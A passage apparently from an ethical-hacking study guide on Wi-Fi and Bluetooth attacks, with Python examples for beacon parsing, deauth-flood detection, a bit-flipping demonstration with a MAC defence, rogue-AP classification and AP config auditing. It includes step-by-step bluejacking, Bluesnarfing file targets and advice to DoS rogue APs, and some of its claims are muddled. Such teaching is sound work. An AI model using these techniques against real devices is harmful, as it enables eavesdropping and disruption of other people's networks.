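monitor-mode capture; the sample BSSIDs and SSIDs are made up.
"""
import struct
from collections import Counter

RSN_IE, VENDOR_IE, CAP_PRIVACY = 48, 221, 0x0010
WPA_OUI_TYPE = b"\x00\x50\xf2\x01"       # vendor element carrying pre-RSN WPA
RSN_AKM_8021X = b"\x00\x0f\xac\x01"      # AKM suite selectors from 802.11
RSN_AKM_PSK = b"\x00\x0f\xac\x02"


def iter_elements(body: bytes):
    """Yield (id, data) for each tagged element; stop cleanly if one is truncated."""
    pos = 0
    while pos + 2 <= len(body):
        eid, elen = body[pos], body[pos + 1]
        data = body[pos + 2:pos + 2 + elen]
        if len(data) < elen:
            return
        yield eid, data
        pos += 2 + elen


def rsn_auth(rsn: bytes) -> str:
    """First AKM suite of an RSN element: version(2) group(4) n(2) pairwise(4n) m(2) akm(4m)."""
    if len(rsn) < 8:
        return "other"
    pos = 8 + 4 * struct.unpack_from("<H", rsn, 6)[0]
    if len(rsn) < pos + 6:
        return "other"
    return {RSN_AKM_8021X: "802.1X", RSN_AKM_PSK: "PSK"}.get(rsn[pos + 2:pos + 6], "other")


def parse_beacon(frame: bytes):
    """Survey record for one beacon frame, or None if the frame is not a beacon."""
    if len(frame) < 36 or frame[0] != 0x80:          # mgmt type, beacon subtype
        return None
    record = {"bssid": ":".join(f"{b:02x}" for b in frame[16:22]), "ssid": "",
              "hidden": False, "security": "Open", "auth": "none"}
    caps = struct.unpack_from("<H", frame, 34)[0]     # after timestamp + interval
    rsn, wpa = None, False
    for eid, data in iter_elements(frame[36:]):
        if eid == 0:                                  # SSID element
            if not data or data == b"\x00" * len(data):
                record["hidden"] = True               # cloaked: empty or NUL-filled
            else:
                record["ssid"] = data.decode("utf-8", "replace")
        elif eid == RSN_IE:
            rsn = data
        elif eid == VENDOR_IE and data[:4] == WPA_OUI_TYPE:
            wpa = True
    if rsn is not None:
        record["security"], record["auth"] = "WPA2", rsn_auth(rsn)
    elif wpa:
        record["security"], record["auth"] = "WPA", "vendor IE"
    elif caps & CAP_PRIVACY:                          # privacy bit without RSN/WPA
        record["security"], record["auth"] = "WEP", "open/shared key"
    return record


def survey(frames):
    return [r for r in map(parse_beacon, frames) if r is not None]


def ssids_with_multiple_aps(records):
    """SSIDs seen from more than one BSSID: a multi-AP ESS or a possible evil twin."""
    counts = Counter(r["ssid"] for r in records if not r["hidden"])
    return {ssid: n for ssid, n in counts.items() if n > 1}


def build_beacon(bssid, ssid, privacy=False, rsn_akm=None, wpa=False):
    """Constructed minimal beacon for the sample set below (not a real capture)."""
    header = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    caps = 0x0001 | (CAP_PRIVACY if privacy else 0)
    body = struct.pack("<QHH", 0, 100, caps) + bytes([0, len(ssid)]) + ssid
    if rsn_akm is not None:
        rsn = (struct.pack("<H", 1) + b"\x00\x0f\xac\x04" + struct.pack("<H", 1)
               + b"\x00\x0f\xac\x04" + struct.pack("<H", 1) + rsn_akm + b"\x00\x00")
        body += bytes([RSN_IE, len(rsn)]) + rsn
    if wpa:
        vendor = WPA_OUI_TYPE + struct.pack("<H", 1)
        body += bytes([VENDOR_IE, len(vendor)]) + vendor
    return header + body


SAMPLE_BEACONS = [
    build_beacon(b"\x00\x11\x22\x33\x44\x01", b"CorpNet", True, RSN_AKM_8021X),
    build_beacon(b"\x00\x11\x22\x33\x44\x02", b"CorpNet", True, RSN_AKM_PSK),
    build_beacon(b"\x00\x11\x22\x33\x44\x03", b"", True),            # cloaked WEP
    build_beacon(b"\x00\x11\x22\x33\x44\x04", b"Guest"),             # open
    build_beacon(b"\x00\x11\x22\x33\x44\x05", b"Legacy", True, wpa=True),
]
```

A cloaked SSID still reveals its BSSID and security mode from the beacon; only the name is withheld, which is why SSID hiding is not a substitute for encryption.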
Wireless cards and chipsets
It is important to select the right Wi-Fi card since tools such as Aircrack-ng and KisMAC are
used only with selected wireless chipsets.
AirPcap
The AirPcap adapter is used to capture full 802.11 data, management, and control frames. These
frames can be viewed in Wireshark for in-depth protocol dissection and analysis. AirPcap can
decrypt WEP/WPA-encrypted frames if configured with the appropriate keys. It also supports
traffic injection, which is used when assessing the security of a wireless network, and it is
supported by Aircrack-ng, Cain & Abel, and Wireshark.
Wireless sniffers
The following are wireless sniffers:
• ApSniff
• NetworkMiner
• Airscanner Mobile Sniffer
• Observer
• WifiScanner
• Mognet
• AirTraf
• Prism2Dump
CommView
CommView is a network monitor and analyzer designed for an individual who wants a full
picture of the traffic flowing through a PC or LAN segment. It is used to collect information
from the wireless adapter and decode the analyzed data.
OmniPeek
OmniPeek is a packet analyzer software tool used for network troubleshooting and protocol
analysis. The OmniPeek network analyzer offers an intuitive, easy-to-use graphical interface that
engineers can use to rapidly analyze and troubleshoot enterprise networks.
Kismet
Kismet is a Linux-based 802.11 wireless network sniffer and intrusion detection system. It can
work with any wireless card that supports raw monitoring (rfmon) mode. Kismet can sniff
802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet can be used for the following tasks:
• To identify networks by passively collecting packets
• To detect standard named networks
• To detect masked (cloaked) networks
• To detect the presence of non-beaconing networks via data traffic
Spectrum analyzer
The RF spectrum analyzer performs the following functions:
• It examines the Wi-Fi radio transmission.
• It measures the power (amplitude) of radio signals and RF pulses and converts the
measurements into numeric sequences.
Spectrum analyzers use statistical analysis to plot spectral usage, quantify air quality, and isolate
transmission sources. RF technicians use RF spectrum analyzers for the following purposes:
• Install and maintain wireless networks.
• Identify sources of interference.
• Help detect wireless attacks.
Wi-Spy and Chanalyzer, AirMagnet Wi-Fi Analyzer, and WifiEagle are spectrum analysis tools.
RF monitoring tools
The following are RF monitoring tools:
• NetworkManager
• KWaveControl
• KWiFiManager
• NetworkControl
• Qwireless
• KOrinoco
• APHunter
Wi-Fi Connection Manager tools
The following are Wi-Fi Connection Manager tools:
• Aironet Wireless LAN
• Boingo
• Odyssey Access Client
• HandyWi
• Wireless Zero Config
• QuickLink Mobile
• Mobile Connect
• Intel PROSet
Wi-Fi Traffic Analyzer tools
The following are Wi-Fi Traffic Analyzer tools:
• Aruba Spectrum Analyzer
• OptiView Network Analyzer
• Ufasoft Snif
• Network Assistant
• AirMagnet Handheld Analyzer
• Network Packet Analyzer
• Network Observer
• vxSniffer
Wi-Fi Raw Packet Capturing tools
The following are Wi-Fi Raw Packet Capturing tools:
• WirelessNetView
• Pirni Sniffer
• Tcpdump
• Airview
• PCAGizmo
Wi-Fi Spectrum Analyzing tools
The following are Wi-Fi Spectrum Analyzing tools:
• Cisco Spectrum Expert
• WifiSleuth
• Wi-Spy
• BumbleBee
• AirMedic
Aircrack-ng suite
Aircrack-ng suite is a network software suite that includes the following for 802.11 wireless
networks:
• Detector
• Packet sniffer
• WEP and WPA/WPA2-PSK cracker and analysis tool
Disassociation attack
The following image explains the working of a disassociation attack:
Deauthentication attack
The following image explains the working of a deauthentication attack:
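Both attacks above rely on forged management frames, and a WIPS or monitor-mode sensor detects them by their rate: a legitimate AP sends an occasional deauthentication or disassociation to one client, whereas a flood sends dozens per second, often to the broadcast address. The following is an added example, not code from the original text: it runs a sliding-window counter over sensor log lines and raises one alert per BSSID. The log line format (t=, subtype=, bssid=, dst=, reason=) is an assumption standing in for whatever the sensor actually emits, and the sample lines are constructed.

```python
"""Detect deauthentication/disassociation floods from management-frame log lines.

Added example with constructed log lines; it is not code from the original text.
The line format (t=, subtype=, bssid=, dst=, reason=) is an assumption standing
in for whatever a monitor-mode sniffer or WIPS sensor emits.
"""
import re
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
LINE_RE = re.compile(
    r"t=(?P<t>\d+(?:\.\d+)?)\s+subtype=(?P<subtype>\w+)\s+bssid=(?P<bssid>[0-9a-f:]{17})"
    r"\s+dst=(?P<dst>[0-9a-f:]{17})\s+reason=(?P<reason>\d+)")


def parse_line(line: str):
    """Parse one sensor line into a dict, or None if it does not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["t"] = float(rec["t"])
    rec["reason"] = int(rec["reason"])
    return rec


def detect_floods(lines, window=1.0, threshold=10):
    """Alert once per BSSID when it sends >= threshold deauth/disassoc frames
    within `window` seconds. Broadcast destinations are recorded because one
    broadcast deauth disconnects every client of that BSSID at once."""
    recent = defaultdict(deque)          # bssid -> timestamps inside the window
    broadcast_seen = defaultdict(int)
    alerted, alerts = set(), []
    for rec in map(parse_line, lines):
        if rec is None or rec["subtype"] not in ("deauth", "disassoc"):
            continue
        bssid, t = rec["bssid"], rec["t"]
        q = recent[bssid]
        q.append(t)
        while q and t - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if rec["dst"] == BROADCAST:
            broadcast_seen[bssid] += 1
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)
            alerts.append({"bssid": bssid, "count": len(q), "first": q[0], "last": t,
                           "broadcast": broadcast_seen[bssid] > 0})
    return alerts


def make_sample():
    """Constructed traffic: a beacon, one inactivity deauth and one client-initiated
    disassociation minutes apart, then a burst of twelve broadcast deauths from a
    second BSSID within half a second (reason 7 is commonly seen in such floods)."""
    lines = [
        "t=100.000 subtype=beacon bssid=00:11:22:33:44:01 dst=ff:ff:ff:ff:ff:ff reason=0",
        "t=101.250 subtype=deauth bssid=00:11:22:33:44:01 dst=aa:bb:cc:dd:ee:01 reason=4",
        "t=130.000 subtype=disassoc bssid=00:11:22:33:44:01 dst=aa:bb:cc:dd:ee:02 reason=8",
    ]
    for i in range(12):
        lines.append(f"t={200 + i * 0.04:.3f} subtype=deauth bssid=00:11:22:33:44:02 "
                     f"dst=ff:ff:ff:ff:ff:ff reason=7")
    return lines


if __name__ == "__main__":
    for alert in detect_floods(make_sample()):
        print(alert)
```

Detection only limits the damage; the mitigation is 802.11w (management frame protection), which has the AP and clients authenticate deauthentication and disassociation frames so forged ones are discarded.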
Hotspotter
Hotspotter is a wireless hacking tool that is used to detect a rogue access point. It fools users to
connect and authenticate with the hacker's tool. It sends the deauthenticate frame to the victim's
computer that causes the victim's wireless connection to be switched to a non-preferred
connection.
Wireless Zero Configuration (WZC)
Wireless Zero Configuration (WZC), also known as Wireless Auto Configuration or WLAN
AutoConfig, is a wireless connection management utility included with Microsoft Windows XP
and later operating systems as a service that dynamically selects a wireless network to connect
on the basis of users' preferences and various default settings. This can be used instead of, or in
the absence of, a wireless network utility from the manufacturer of a computer's wireless
networking device. The drivers for the wireless adapter query the NDIS Object IDs and pass the
available network names to the service. WZC also introduced some security threats, which are as
follows:
• WZC probes for networks that it has previously connected to. This information can be
viewed by anyone using a wireless analyzer and can be used to set up fake access points
for the client to connect to.
• WZC attempts to connect to the wireless network with the strongest signal. Attackers can
create fake wireless networks with high-power antennas and cause computers to associate
with their access point.
Airjack
Airjack is a collection of wireless card drivers and related programs. It uses a program called
monkey_jack that is used to automate the MITM attack. Wlan_jack is a DoS tool in the set of
airjack tools which accepts a target source and BSSID to send continuous deauthenticate frames
to a single client or an entire network. In the same way, we can use the tool essid_jack that can
be used to send a disassociate frame to a target client in order to force the client to reassociate
with the network and give up the network SSID.
Ettercap
Ettercap is a UNIX and Windows tool for computer network protocol analysis and security
auditing. It is capable of intercepting traffic on a network segment, capturing passwords, and
conducting active eavesdropping against a number of common protocols. It is free open source
software. Ettercap supports active and passive dissection of many protocols (including ciphered
ones) and provides many features for network and host analysis.
AiroPeek
AiroPeek is a Windows-based commercial wireless LAN analyzer for IEEE 802.11b. It supports
all high level protocols such as TCP/IP, NetBEUI, IPX, etc. It can be used to perform the
following tasks:
• Site surveys
• Security assessments
• Channel scanning
• Real time and past capture WEP decryption
• Client troubleshooting
• WLAN monitoring
• Remote WLAN analysis
• Application layer protocol analysis
OpenBTS
OpenBTS is a software-based GSM access point, allowing standard GSM-compatible mobile
phones to make telephone calls without using existing telecommunication providers' networks.
OpenBTS replaces the traditional GSM operator network switching subsystem infrastructure
from the Base Transceiver Station (BTS) upwards. Instead of forwarding call traffic through to
an operator's mobile switching centre (MSC), the calls are terminated on the same box by
forwarding the data onto the Asterisk PBX via SIP and Voice-over-IP (VoIP).
Bit-flipping attack
A bit-flipping attack is an attack on a cryptographic cipher in which the attacker can change the
ciphertext in such a way as to result in a predictable change of the plaintext, although the attacker
is not able to learn the plaintext itself. Note that this type of attack is not directly against the
cipher itself (as cryptanalysis of it would be), but against a particular message or series of
messages. In the extreme, this could become a Denial of service attack against all messages on a
particular channel using that cipher. The attack is especially dangerous when the attacker knows
the format of the message. In such a situation, the attacker can turn it into a similar message but
one in which some important information is altered. For example, a change in the destination
address might alter the message route in a way that will force re-encryption with a weaker
cipher, thus possibly making it easier for an attacker to decipher the message.
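The malleability described above is easiest to see with a stream cipher, where flipping a ciphertext bit flips exactly the same plaintext bit. The following is an added example, not code from the original text: it shows the predictable change on an unauthenticated message and then the encrypt-then-MAC check that rejects the altered ciphertext. The keystream is a constructed SHA-256 counter construction standing in for an RC4- or CTR-style cipher (not a recommended cipher), and the keys, nonce and message format are fixed demo values.

```python
"""Bit flipping against an unauthenticated stream cipher, and the
encrypt-then-MAC check that detects it.

Added example; it is not code from the original text. The keystream is a
constructed SHA-256 counter construction (a stand-in for RC4/CTR-style
ciphers, not a recommended cipher); keys and nonce are fixed demo constants.
"""
import hashlib
import hmac

NONCE_LEN, TAG_LEN = 12, 32


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stream_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR with the keystream; encryption and decryption are the same operation."""
    return xor_bytes(data, keystream(key, nonce, len(data)))


def flip_field(ciphertext: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """The malleability the text describes: XORing (known ^ wanted) into the
    ciphertext changes the corresponding plaintext bytes without the key."""
    delta = xor_bytes(known, wanted)
    end = offset + len(delta)
    return ciphertext[:offset] + xor_bytes(ciphertext[offset:end], delta) + ciphertext[end:]


def seal(enc_key: bytes, mac_key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the tag covers the nonce and the ciphertext."""
    ct = stream_crypt(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag


def open_sealed(enc_key: bytes, mac_key: bytes, blob: bytes):
    """Return the plaintext, or None if the tag does not verify."""
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None
    return stream_crypt(enc_key, nonce, ct)


def demo():
    enc_key = b"\x11" * 32              # constructed demo keys
    mac_key = b"\x22" * 32
    nonce = b"\x00" * NONCE_LEN
    message = b"TO=ALICE;AMT=0010"       # the attacker knows this fixed format
    offset, known, wanted = 13, b"0010", b"9910"

    # Unauthenticated: the altered ciphertext decrypts to an altered message.
    ct = stream_crypt(enc_key, nonce, message)
    tampered_plain = stream_crypt(enc_key, nonce, flip_field(ct, offset, known, wanted))

    # Authenticated: the same flip is caught by the HMAC check.
    blob = seal(enc_key, mac_key, nonce, message)
    ct_part = blob[NONCE_LEN:-TAG_LEN]
    tampered_blob = (blob[:NONCE_LEN] + flip_field(ct_part, offset, known, wanted)
                     + blob[-TAG_LEN:])
    return {
        "roundtrip": open_sealed(enc_key, mac_key, blob),
        "tampered_plain": tampered_plain,
        "tampered_sealed": open_sealed(enc_key, mac_key, tampered_blob),
    }


if __name__ == "__main__":
    print(demo())
```

A linear checksum such as the CRC-32 integrity value used by WEP does not help here, because the checksum change caused by a flip is itself predictable; a keyed MAC or an authenticated mode such as CCMP is what makes the tampering detectable.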
15.4 Understand Bluetooth hacking, and understand how to defend against Bluetooth hacking
Exam Focus: Understand Bluetooth hacking, and understand how to defend against Bluetooth
hacking. Objective includes:
• Understand Bluetooth hacking.
• Understand how to defend against Bluetooth hacking.
Bluetooth hacking
In Bluetooth hacking, Bluetooth stack implementation vulnerabilities are exploited so that
sensitive data in Bluetooth-enabled devices and network can be compromised. Bluetooth enabled
electronic devices connect and communicate wirelessly via piconets. Piconets are short range, ad
hoc networks.
Bluesmacking attack
In a Bluesmacking attack, the attacker uses the Logical Link Control and Adaptation Layer
Protocol (L2CAP) when performing this type of attack. For this, he creates a data packet larger
than the allowable size in the device and sends it to the victim's device.
Bluesnarfing
In Bluesnarfing, an attacker steals information from a wireless device through a Bluetooth
connection. For this attack, the attacker connects to the OBEX Push target and performs an
OBEX GET request for known filenames, such as 'telecom/pb.vcf' for the device's phone book or
'telecom/cal.vcs' for the device's calendar file.
Security issues while using Bluetooth
The following are the security issues while using Bluetooth:
• Short PINs are allowed, which can be easily guessed.
• The length of the Bluetooth encryption key is negotiable.
• In Bluetooth communication, a unit key (a link key that one device generates and uses as a
link key with any other device) can be reused, and once used, it becomes public. It can be
used only in full trust environments because every paired device can impersonate any other
device holding the same unit key.
• The master key of the pairing devices is shared.
• An attacker can gain unauthorized access to two other users if that attacker has
communicated with either of the other two users before.
• In Bluetooth communications, only the device is authenticated, not individual users,
which means anyone can use the device as long as it is authenticated.
• In Bluetooth communication, only the individual links are encrypted and authenticated.
• Security services such as auditing, non-repudiation, etc. do not exist.
Bluejacking
Bluejacking is one of the most common attacks in Bluetooth hacking. In bluejacking, an attacker
sends unsolicited messages over Bluetooth to Bluetooth-enabled devices such as PDA and
mobile phones.
Bluejack a victim
Take the following steps to bluejack a victim:
1. Choose an area with plenty of mobile users.
2. Create a new contact on your phone address book.
3. Enter the message into the name field.
4. Save the new contact.
5. Select "send via Bluetooth". This makes a search for any Bluetooth device within range.
6. Select one phone from the list that is discovered by Bluetooth and send the contact.
7. You will get the message "card sent" and then listen for the SMS message tone of your
victim's phone.
Bluetooth stack
The following is the Bluetooth stack:
The following are Bluetooth modes:
• Discoverable: In this mode, inquiry responses are sent to all queries.
• Limited discoverable: In this mode, visibility is for a certain period of time.
• Non-discoverable: In this mode, inquiry scan is never answered.
The following are pairing modes:
• Non-pairable mode: In this mode, every pairing request is rejected.
• Pairable mode: In this mode, the device pairs upon request.
Bluetooth threats
The following are Bluetooth threats:
• Leaking calendars and address books: User's personal information can be stolen and
can be used by an attacker for malicious purposes.
• Bugging devices: An attacker can make the user's phone call another person. The
attacker can even record their communication.
• Sending SMS messages: Terrorists can use the phones of legitimate users to send false
bomb threats to airlines.
• Causing financial losses: Hackers can use an international user's phone to send many
MMS messages. This results in a high phone bill.
• Remote control: Hackers can remotely control a phone and make phone calls or connect
to the Internet.
• Social engineering: Attackers trick Bluetooth users to lower security or disable
authentication for Bluetooth connections to pair with them and steal information.
• Malicious code: Mobile phone worms can replicate and spread themselves by exploiting a
Bluetooth connection.
• Protocol vulnerabilities: An attacker exploits Bluetooth pairings and communication
protocols for the following purposes:
o Stealing data
o Making calls
o Sending messages
o Conducting DoS attacks on a device
o Starting phone spying
Bluebug attack
In the Bluebug attack, an attacker exploits the loopholes of Bluetooth and gets unauthorized
access to a Bluetooth-enabled device. By this attack, an attacker can perform the following
unauthorized activities:
• Initiate phone calls.
• Send an SMS to any number.
• Read SMS from the phone.
• Read and write the phonebook entries.
• Set call forwards.
• Make an Internet connection.
Short pairing code attack
In a short pairing code attack, the attacker takes advantage of the pairing between two devices by
sharing some secret which is used for future communication. For this, the attacker forces a pair
of Bluetooth devices to repeat the pairing process and eavesdrop on it.
BTKeylogging attack
In a BTKeylogging attack, the attacker uses the PIN Cracking attack to discover the fixed PIN
code of the target Bluetooth keyboard. This attack is possible if the target keyboard has a fixed
PIN code and the attacker knows its BD_ADDR. The attacker uses a protocol analyzer for
intercepting all required information and then uses the keyboard as a keylogger to identify all
packets.
BTVoiceBugging attack
A BTVoiceBugging attack is possible when the attacker knows the fixed PIN of the target device.
Using a protocol analyzer, the attacker opens a two-way real-time SCO/eSCO link with the
headset.
BlueSpam attack
In a BlueSpam attack, the attacker finds out the other Bluetooth-enabled devices and sends a file
to spam them. This attack is done by using the OBEX protocol. It can be done on any types of
files, such as VCFs, simple ASCII text files, images files, audio, and video files.
PhoneSnoop
PhoneSnoop is BlackBerry spyware. An attacker can use PhoneSnoop to remotely activate the
microphone of a BlackBerry handheld and listen to sounds near or around it. When PhoneSnoop
is used to conduct surveillance on an individual, it solely demonstrates the capabilities of
BlackBerry handheld. PhoneSnoop is purely a proof-of-concept application. It does not have the
stealth or spyware features that can make it malicious.
BlueScanner
BlueScanner is a Bluetooth device discovery and vulnerability assessment tool for Windows. It
discovers Bluetooth devices type such as phone, computer keyboard, and PDA and the services
that the devices advertise. It records all information that can be collected from the device,
without trying to authenticate with the remote device.
Bluetooth hacking tools
The following are Bluetooth hacking tools:
• BH Bluejack
• Bluesnarfer
• Bluediving
• Blooover
• BTScanner
• BTCrack
• BTBrowser
• BTCrawler
Defending against Bluetooth hacking
The following actions can be taken to defend against Bluetooth hacking:
• While pairing a device, non-regular patterns should be used as PIN keys. Key
combinations that are non-sequential on the keyboard should be used.
• Encryption should be enabled when a BT connection is established to your PC.
• The list of previously paired devices should be reviewed from time to time, and any paired
device about which you are not sure should be deleted.
• BT should be kept in the disabled state. It should be enabled only when required, and
disabled immediately after the completion of the intended task.
• The device should be kept in non-discoverable (hidden) mode.
• Any unknown or unexpected request to pair with your device should not be accepted.
Detecting and blocking rogue AP
Detecting rogue APs involves the following:
• RF scanning: Repurposed access points (used only for packet capturing and analysis) are
plugged in throughout the wired network to detect and warn the WLAN administrator about
any wireless devices operating in the nearby area.
• AP scanning: Access points that can detect neighboring APs operating in the nearby area
expose the data through their MIBs and web interface.
• Using wired side input: Network management software uses multiple protocols to detect
devices in the LAN and can thereby detect rogue APs.
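Whichever of the three inputs supplies the scan, the detection step itself is a comparison against the authorized AP inventory. The following is an added example, not code from the original text: it classifies each scanned BSSID as authorized, misconfigured (an authorized AP advertising the wrong SSID), an evil twin (a known SSID from an unknown BSSID), a rogue candidate (an unknown network strong enough to be on the premises) or a weak neighbor, and maps the results to the blocking actions listed below. The inventory, switch ports and scan records are constructed assumptions about what a WLAN controller or RF sensor would export.

```python
"""Compare a wireless scan against the authorized AP inventory to flag rogue APs.

Added example with constructed data; it is not code from the original text.
The inventory and scan records are assumptions about what an RF sensor or AP
scan would export; a real deployment would feed them from the WLAN controller.
"""

AUTHORIZED = {                      # bssid -> (ssid, switch port) from the inventory
    "00:11:22:33:44:01": ("CorpNet", "sw1/0/1"),
    "00:11:22:33:44:02": ("CorpNet", "sw1/0/2"),
    "00:11:22:33:44:03": ("CorpGuest", "sw1/0/3"),
}

SCAN = [                            # constructed output of an AP scan / RF sensor
    {"bssid": "00:11:22:33:44:01", "ssid": "CorpNet", "channel": 6, "rssi": -48},
    {"bssid": "00:11:22:33:44:02", "ssid": "CorpNet", "channel": 11, "rssi": -55},
    {"bssid": "de:ad:be:ef:00:01", "ssid": "CorpNet", "channel": 6, "rssi": -40},
    {"bssid": "00:11:22:33:44:03", "ssid": "Visitors", "channel": 1, "rssi": -60},
    {"bssid": "c0:ff:ee:00:00:02", "ssid": "Neighbor", "channel": 1, "rssi": -85},
]


def oui(bssid: str) -> str:
    """First three octets of a MAC address, the vendor identifier."""
    return bssid[:8]


def classify_scan(scan, authorized, rssi_floor=-75):
    """Return findings: evil twins (known SSID, unknown BSSID), authorized APs
    advertising an unexpected SSID, and unknown networks strong enough to be
    on-premises. Weak unknowns are reported as 'neighbor' and not escalated."""
    known_ssids = {ssid for ssid, _ in authorized.values()}
    corp_ouis = {oui(b) for b in authorized}
    findings = []
    for ap in scan:
        bssid, ssid = ap["bssid"], ap["ssid"]
        if bssid in authorized:
            expected, port = authorized[bssid]
            if ssid != expected:
                findings.append({"bssid": bssid, "verdict": "misconfigured",
                                 "detail": f"{port} advertises {ssid!r}, expected {expected!r}"})
            continue
        if ssid in known_ssids:
            verdict = "evil-twin"
        elif ap["rssi"] >= rssi_floor:
            verdict = "rogue-candidate"
        else:
            verdict = "neighbor"
        vendor = "corporate OUI" if oui(bssid) in corp_ouis else "foreign OUI"
        findings.append({"bssid": bssid, "verdict": verdict,
                         "detail": f"ssid={ssid!r} ch={ap['channel']} rssi={ap['rssi']} ({vendor})"})
    return findings


def blocking_actions(findings, authorized):
    """Map each verdict to the containment step the text lists: shut the known
    switch port for a misconfigured AP, locate and remove a rogue physically."""
    actions = []
    for f in findings:
        if f["verdict"] == "misconfigured":
            actions.append(f"disable switch port {authorized[f['bssid']][1]} and fix config")
        elif f["verdict"] in ("evil-twin", "rogue-candidate"):
            actions.append(f"locate {f['bssid']} by RSSI and remove it from the LAN")
    return actions


if __name__ == "__main__":
    found = classify_scan(SCAN, AUTHORIZED)
    for f in found:
        print(f["verdict"], f["bssid"], f["detail"])
    print(blocking_actions(found, AUTHORIZED))
```

The RSSI floor separates a neighbor's AP, which is outside your control, from an unknown device strong enough to be inside the building; tune it from a site survey rather than guessing.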
The following actions should be taken to block a rogue AP:
• A Denial of Service attack should be launched on the rogue AP to deny access to new
clients.
• The switch port to which the AP is connected should be blocked, or the AP should be
manually located and pulled physically off the LAN.
15.5 Understand how to defend against wireless attacks, and identify Wi-Fi security tools
Exam Focus: Understand how to defend against wireless attacks, and identify Wi-Fi security
tools. Objective includes:
• Understand how to defend against wireless attacks.
• Identify Wi-Fi security tools.
Defending against wireless attacks
The following are Wi-Fi configuration best practices:
• The default SSID should be changed after WLAN configuration.
• The router access password should be set and firewall protection should be enabled.
• SSID broadcasts should be disabled.
• Remote router login and wireless administration should be disabled.
• MAC address filtering on your access point or router should be enabled.
• Encryption on the access point should be enabled and the passphrase should be changed
often.
The following are SSID best practices:
• SSID cloaking should be used to keep certain default wireless messages from
broadcasting the ID to everyone.
• You should not use your SSID, company name, network name, or any easy-to-guess
string in passphrases.
• A firewall or packet filter should be placed between the AP and the corporate Intranet.
• The signal strength of the wireless network should be limited to prevent it from being
detected outside the bounds of your organization.
• The wireless devices should be checked regularly for configuration or setup problems.
• An additional technique, beyond the WLAN's own encryption, should be implemented to
encrypt traffic.
The following are Wi-Fi authentication best practices:
• WPA should be chosen instead of WEP.
• WPA2 Enterprise should be implemented wherever possible.
• The network should be disabled when it is not needed.
• Wireless access points should be placed in a secured location.
• Drivers on all wireless equipment should be kept updated.
• A centralized server should be used for authentication.
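Most of the configuration, SSID and authentication practices above can be checked mechanically against an access point's configuration. The following is an added example, not code from the original text: it audits a hostapd-style key=value configuration for a default SSID, WEP or WPA1, TKIP, a PSK instead of WPA2 Enterprise, a short or SSID-derived passphrase, SSID broadcast, MAC filtering turned off and missing management frame protection, and contrasts a weak configuration with a hardened one. The key names (ssid, wpa, wpa_key_mgmt, rsn_pairwise, ignore_broadcast_ssid, macaddr_acl, wep_default_key, ieee80211w) follow hostapd; that the AP under audit uses them is an assumption, and both sample configurations are constructed.

```python
"""Audit a hostapd-style AP configuration against the best practices above.

Added example; it is not code from the original text. It assumes the AP is
configured with hostapd-style key=value lines (ssid, wpa, wpa_key_mgmt,
rsn_pairwise, ignore_broadcast_ssid, macaddr_acl, wep_default_key, ieee80211w);
the two sample configurations below are constructed.
"""

# Factory-default SSIDs to flag; a constructed list for the demo.
DEFAULT_SSIDS = {"default", "linksys", "netgear", "dlink", "wireless"}


def parse_config(text: str) -> dict:
    """Parse key=value lines, ignoring blanks and '#' comments."""
    config = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        config[key.strip()] = value.strip()
    return config


def audit(config: dict):
    """Return a list of (severity, key, finding) tuples; empty means no issues."""
    findings = []
    ssid = config.get("ssid", "")
    if ssid.lower() in DEFAULT_SSIDS:
        findings.append(("medium", "ssid", "default SSID still in use"))
    wpa = config.get("wpa", "0")                      # hostapd bit field: 1=WPA, 2=WPA2
    if any(k.startswith("wep_") for k in config):
        findings.append(("high", "wep_default_key", "WEP is enabled"))
    elif wpa == "0":
        findings.append(("high", "wpa", "no WPA: network is open or WEP-only"))
    elif wpa == "1":
        findings.append(("high", "wpa", "WPA (TKIP era) only; use wpa=2"))
    elif wpa == "3":
        findings.append(("medium", "wpa", "mixed WPA/WPA2 allows TKIP fallback"))
    key_mgmt = config.get("wpa_key_mgmt", "")
    if wpa != "0" and "WPA-EAP" not in key_mgmt:
        findings.append(("low", "wpa_key_mgmt", "PSK in use; prefer WPA2 Enterprise (WPA-EAP)"))
    if "TKIP" in config.get("rsn_pairwise", "") or "TKIP" in config.get("wpa_pairwise", ""):
        findings.append(("medium", "rsn_pairwise", "TKIP permitted; use CCMP only"))
    if wpa != "0" and key_mgmt and "WPA-EAP" not in key_mgmt:
        passphrase = config.get("wpa_passphrase", "")
        if len(passphrase) < 20 or passphrase.lower() in {ssid.lower(), "password"}:
            findings.append(("high", "wpa_passphrase", "short or guessable passphrase"))
    if config.get("ignore_broadcast_ssid", "0") == "0":
        findings.append(("low", "ignore_broadcast_ssid", "SSID is broadcast"))
    if config.get("macaddr_acl", "0") != "1":
        findings.append(("low", "macaddr_acl", "MAC address filtering is off"))
    if config.get("ieee80211w", "0") == "0":
        findings.append(("medium", "ieee80211w", "management frame protection disabled"))
    return findings


WEAK_CONFIG = """
interface=wlan0
ssid=linksys
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=linksys
"""

HARDENED_CONFIG = """
interface=wlan0
ssid=CorpNet
ignore_broadcast_ssid=1
wpa=2
wpa_key_mgmt=WPA-EAP
rsn_pairwise=CCMP
ieee8021x=1
auth_server_addr=10.0.0.5
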